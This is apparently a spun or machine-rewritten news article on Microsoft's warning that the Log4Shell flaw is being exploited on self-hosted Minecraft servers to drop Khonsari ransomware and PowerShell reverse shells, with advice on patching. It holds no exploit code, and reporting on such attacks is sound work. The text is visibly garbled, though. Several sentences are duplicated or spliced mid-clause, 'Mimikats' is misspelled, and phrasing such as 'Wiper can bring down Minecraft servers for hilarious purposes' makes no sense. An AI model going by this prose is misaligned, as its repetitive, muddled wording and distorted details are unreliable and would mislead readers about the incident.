Microsoft is recommending that administrators of self-hosted Minecraft servers upgrade to the latest release to protect against the Khonsari ransomware attack, which exploits a Log4Shell security vulnerability.
Minecraft administrators running their own servers are encouraged to deploy the latest Minecraft server updates as soon as possible to protect their users. More information can be found here: https://aka.ms/mclog
Mojang Studios, the Swedish game developer behind Minecraft, has announced that it has discovered a bug tracked as CVE- 2021-44228 in the Apache Log4j Java logging library used in the Java version of the Minecraft client and multiplayer server. Mojang Studios, a Swedish game developer, has released an urgent security update to address a vulnerability tracked as CVE-2021-44228 in the Apache Log4j Java logging library used in the Java client and multiplayer server for Minecraft.
At the time, there was no mention of an attack on Minecraft servers using Log4Shell, but Redmond security experts have updated their guidance on CVE-2021-44228 to warn that end-user-hosted Minecraft servers continue to be exploited by Redmond security experts have updated their guidance on CVE-2021-44228 to warn of ongoing ransomware exploits on end-user hosted Minecraft servers.
In these cases, the adversary sends a malicious in-game message to a vulnerable Minecraft server and exploits CVE-2021-44228 to execute a payload delivered by the attacker on both the server and the connected vulnerable client.
We identified an exploit that leads to a malicious Java class file that is the Khonsari ransomware, which causes the attacker to execute the delivered payload.
It then runs on javaw.exe and demands a ransom for the device.
The Microsoft 365 Defender Threat Intelligence Team and the Microsoft Threat Intelligence Center (MSTIC) have confirmed that a PowerShell-based reverse shell has also been deployed in a network breach targeting Minecraft servers.
The Microsoft 365 Defender Threat Intelligence Team and the Microsoft Threat Intelligence Center (MSTIC) have also confirmed that PowerShell-based reverse shells have been deployed in network breaches targeting Minecraft servers using the Log4j exploit as an entry point.
While Minecraft is not believed to be installed on corporate endpoints, an attacker who successfully compromises one of these servers could use Mimikats to steal credentials and maintain access to the compromised system for subsequent activities. It is believed to be used to steal credentials and maintain access to the compromised system for subsequent activities.
How to protect your Minecraft server from Log4Shell attacks
Microsoft is warning all Minecraft server administrators to install the latest Minecraft server update immediately to protect their servers from these attacks, and is asking players to connect only to trusted Minecraft servers. We are also asking players to connect only to trusted Minecraft servers.
If you are hosting your own Minecraft.Java Edition server, please follow the official instructions.
In order to upgrade to this patched version, players using Mojang’s official client will need to close all running games and instances of Minecraft Launcher and restart Launcher, which will automatically install the patch. The patch will be installed automatically.
If you are using a modified Minecraft client or third party launcher, please contact your third party provider to obtain security updates.
Khonsari is a wiper
Khonsari, which Bitdefender classified as ransomware for this attack, was first discovered being used in a Log4Shell attack.
However, Khonsari’s ransom note does not include instructions on how to contact the ransomware operator and pay the ransom.
Emsisoft analyst Brett Callow also pointed out that the ransomware’s name is not that of the attacker, but uses the contact information of the owner of a Louisiana antique store.
Because of the lack of payment information, this ransomware is classified as a destructive malware called Wiper. Wiper can bring down Minecraft servers for hilarious purposes.
Comments